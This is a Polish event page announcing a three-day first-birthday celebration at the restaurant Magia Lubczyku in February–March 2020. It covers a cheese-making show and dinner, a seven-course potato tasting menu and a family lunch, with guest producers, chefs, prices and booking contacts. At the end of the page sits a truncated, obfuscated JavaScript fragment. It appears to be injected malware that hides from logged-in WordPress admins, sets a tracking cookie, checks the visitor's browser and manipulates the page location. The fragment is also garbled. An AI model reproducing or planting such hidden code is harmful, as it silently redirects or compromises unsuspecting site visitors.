I Urodziny Magii Lubczyku | Północna Izba Gospodarcza w Koszalinie

Pierwsze Urodziny Magii Lubczyku!
Zapraszamy do świętowania razem z nami!
Trzy dni najlepszych smaków, prawdziwych historii, zaskakujących talentów oraz wspaniałej zabawy i nauki.

28.02.2020, piątek
Poznaj polskiego Serowara Cz.2
Start godz.18:00
cena: 150zł/ osoba

Goście specjalni:
‍♂️Ecokolonia Marta i Mariusz Bryccy –Współorganizator
‍♀️Gospodarstwo Jasionek – Zosia Bechler,
‍♂️Katarzyna Żerdzicka- Jasionek
‍♂️Serowar Żuławski – Krzysztof Jaworski
‍♀️Serowarnia Capri – Grażyna Szłapka
‍♂️Serowarnia Wańczykówka – Sylwester i Lucyna Wańczyk
‍♂️Serowarnia Groser – Monika i Waldemar Lasoń
‍♀️Agroturystyka Alpaki na Sosnowych Wzgórzach – Joanna Łysiak
‍♀️Winnica Sydonia -Dagmara i Sebastian Pilczuk

Pokaz serowarski
Prowadzący – Sylwester Wańczyk – Właściciel ekologicznego gospodarstwa Wańczykówka położonego w Sudetach. Krzeszów to malownicze miejsce, gdzie tradycyjnie powstają i dojrzewają sery z mleka krowiego, owczego a także koziego. Kunszt serowarski Państwa Wańczyk został doceniony przez żółty przewodnik Gault&millau Polska, organizacje Slow Food Polska, magazyn KUKBUK i wiele innych prestiżowych organizacji.

Poruszane zagadnienia:
Mleko jako surowiec / sprzęt kuchenny niezbędny do przygotowania sera / dodatki serowarskie –bakterie, podpuszczki / techniki solenia sera / dojrzewanie i pielęgnacja sera, / higiena przy produkcji sera / podstawowe typy sera i różnice w ich przygotowaniu.

Menu 4-daniowe z wykorzystaniem serów zagrodowych:

✔Przystawka
Sałatka z pieczonych warzyw z wędzona ricottą od Państwa Bryckich
(wężymord / buraki / dynia / topinambur / brukselka / Ricotta / orzechy)

✔Zupa
Krem z selera z serem ordoblue rokpol z oryginalnego przepisu z lat 50 od Grażyny Szłapki
(wędzony seler / śmietana / oliwa truflowa / trufle / ser rokpol)

✔Danie główne
Rostbef wołowi dojrzewający 31 dni z Witkowa z kopytkami z serem owczym od Państwa Wańczyk
(ziemniaki z gospodarstwa Państwa Szkuat / mąka ze Stoisławia / ser owczy dojrzewający / rostbef z Witkowa / demi glace cielęcy / mini brokuł)

✔Deser
Sernik z koziego sera z gospodarstwa Jasionek
(kozi ser / pigwa / mirabelka / czeremcha)

Dopełnieniem będą wina z regionalnej winnicy Sydonia oraz nalewki Magii Lubczyku

 Muzycznie czas umili gitarzysta, Mikołaj Podolski

Jarmark
Spróbuj i ciesz się dłużej w domowym zaciszu serowymi smakołykami!
Po zakończonej kolacji będzie możliwość zakupu serów prezentowanych na kolacji oraz podstawowego sprzętu do domowego serowarstwa.
*dla zainteresowanych dostępne przepis na jogurt i ser podpuszczkowy

29.02.2020, sobota
Kolacja degustacyjna pt. 
„Polski Folklor Kulinarny” cz.1
ziemniak, pyra, grule, ziemnioki
Start 17:00
cena:190zł/ osoba

Goście specjalni:
Dawid Łagowski – szef kuchni Pałacu Mierzęcin, właściciel marki manufaktura łagowski, półfinalista szóstej edycji Top Chef, laureat wielu nagród kulinarnych.
Patryk Dziamski – szef kuchni i właściciel restauracji Aroma by Patryk Dziamski, uczestnik 4-tej edycji programu Top Chef, współtwórca Poznańscy Kucharze Razem oraz festiwalu kulinarnego Transatlantyk w Łodzi.
‍Tomasz Purol– szef kuchni w restauracji Blow Up Hall 5050 w Poznaniu, zwycięzca 5-tej edycji programu Top Chef, laureat wielu nagród kulinarnych.
Piotr Purol -przez ostatnie 12 lat zastępca szefa kuchni w restauracji Fire w Dublinie,
Sergiusz Hieronimczak– uwielbia kuchnię klasyczną, śródziemnomorską i fusion. Jest obrońcą pełnej złych skojarzeń kuchni angielskiej. Uwielbia historię, szczególnie tę związaną z rozwojem gastronomii. Był finalistą 5-tej edycji Top Chef.

Czas muzycznie umili Paulina Lenda – uczestniczka Mam Talent, Must be the Music czy Szansy na Sukces oraz gitarzysta, Piotr Kozub.

Dopełnieniem będą wina z regionalnej winnicy Kojder oraz nalewki Magii Lubczyku

Załoga Magii Lubczyku:
Maciej Żukowski -szef kuchni, Dawid Owedyk- szef zmiany, Sebastian Perun -szef zmiany, Aleksander Puzio- Lider, Filip Janowski- kucharz, Michał Zieliński- kucharz, Krzysztof Statkiewicz- kucharz.

Inspiracją do kolacji są połączenia kuchni regionalnej, kulinarne naleciałości przesiedleńcze oraz regionalne produkty w odsłonie kuchni restauracyjnej.

 Tematem przewodnim 7-daniowego menu będzie ziemniak:

Wielkopolska
✔Ziemniak z ogniska z gzikiem, olejem z wędzonych warzyw, oliwą lubczykową i wędzonym kawiorem
(ziemniak asterix / biały ser od Wojciecha Pilcha / olej z wędzonych warzyw –manufaktura Łagowski / oliwa lubczykowa / kawior wędzony z pstrąga z regionalnej hodowli w Zielenicy)

Zachodniopomorskie:
✔Pierogi z kozim serem z gospodarstwa Jasionek od Zosi Bechler, ziemniakami bella rosa i czarnuszką
(świeży ser kwasowo podpuszczkowy z ekologicznego gospodarstwa Jasionek / ziemniaki bella rosa / czarnuszka / dynia / mięta)

Podhale:
✔Moskole (placki) z kiszonym łososiem Jurajskim, wędzona śmietana
(kiszony łosoś jurajski od Zubowicza / liść nasturcji / oliwa koperkowa / kiszony czosnek / wędzona śmietana / ziemniak jelly / puder z nieaktywnych drożdży z liściem laurowym)

Łódzkie:
✔Zalewajka na serwatce z chrzanem
(ziemniaki merlot / kiszony czosnek / chipsy ze skóry wieprzowej / puree z chrzanem i kminkiem / por gotowany w maśle / chipsy z cebuli / świeży majeranek)

Kaszuby:
✔Chałupcie (gołąbki) okraszone polskimi rakami
(kiszona kapusta w główkach / ziemniaki denar / raki / koper / wędzony boczek ze świni złotnickiej / trufle)

Śląsk:
✔Rolada z combra z jelenia z kartoflakiem (baba ziemniaczana), modrą kapustą z wędzoną maślanką
(ziemniaki vineta / comber z jelenia / wędzona słonina ze świni złotnickiej / ogórek na solance kołobrzeskiej / puree z czerwonej kapusty / demi glace z dziczyzny / kiszony burak / lody musztardowe / oliwa z lubczyku)

✔Deser
Rurka z suszonych ziemniaków Jelly
(ziemniak jelly / ricotta od Bryckich / pyłek kwiatowy z Pasieki Hawran / pigwa / czeremcha)

01.03.2020 Niedziela
Obiad rodzinny –pt.
„Regionalne Produkty bez tajemnic”- poznaj ludzi, którzy je tworzą, cz.1
Start 14:00
cena: 90 zł/ osoba,
dziecko do 16 roku 45zł,
dzieci do 3 lat gratis

Goście specjalni:
‍♀️Wojciech i Elżbieta Pilch – sery, drób
‍♂️Państwo Szkuat – gospodarstwo rolne
‍♂️Piasieka z pasją Hawran – Paweł Hawran
‍♀️Rajewscy – sadownicy, produkcja soków
‍♂️Gospodarstwo Rolne Państwa Jager
‍♀️Ecokolonia- Mariusz i Marta Bryccy- sery

Stół regionalnych specjałów:
Sery –Gospodarstwo Ecokolonia-Państwo Bryccy, Gospodarstwo Jasionek Zosia Bechler, Katarzyna Żerdzicka Jasionek, Gospodarstwo Wojciech i Elżbieta Pilch
Miody- Pasieka z pasją Hawran – Paweł Hawran, Andrzej Kostka
Soki- Sady Państwa Rajewskich
Wędzone ryby- gospodarstwo rybackie Zielenica Anna i Łukasz Skowrońscy, Ryby Zubowicz- Kamień Pomorski
Przetwory – Gospodarstwo Rolne Państwa Jager
Wyroby z regionalnej masarni – Krzysztof i Robert Bułhak z Kukani
Kiszonki –Gospodarstwo Rolne Państwo Stachniak

Menu niedzielnego obiadu:

✔Zupa serwowana w wazie:
ogórkowa na wędzonych żeberkach
(ogórki z gospodarstwa Państwa Stachniak / żeberka z Witkowa / lubczyk / śmietana z gospodarstwa Wojciecha Pilcha)

✔Danie główne serwowane na półmiskach:
kaczka pieczona w niskiej temperaturze (rasa Mulard- krzyżówka kaczki z gęsią z gospodarstwa Państwa Szkuat)
✔Dodatki:
– kasza jęczmienna perłowa z młyna w Stoisławiu,
– ziemniaki od Państwa Szkuat,
– domowe kopytka,
– zasmażana modra kapusta,
– tradycyjna mizeria,
– buraki z jabłkiem.
✔Kompot
✔Deser:
– miodownik
(mąka z młyna w Stoisławiu / masło od Wojciecha Pilcha / miód od Hawrana / kasza manna z młyna w Stoisławiu / jaja kurze od Państwa Szkuat)

– karpatka
(mleko od Piotra i Moniki Rybka / mąka z młyna w Stoisławiu / masło od Wojciecha Pilcha/ jaja kurze od Państwa Szkuat)

Muzycznie czas umili gitarzysta, Mikołaj Podolski.

Dopełnieniem będą wina z regionalnej winnicy Turnau oraz nalewki Magii Lubczyku.

Zapraszamy do rezerwacji stolików! 

mail: restauracja@havethotel.pl
 +48 94 711 36 82

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m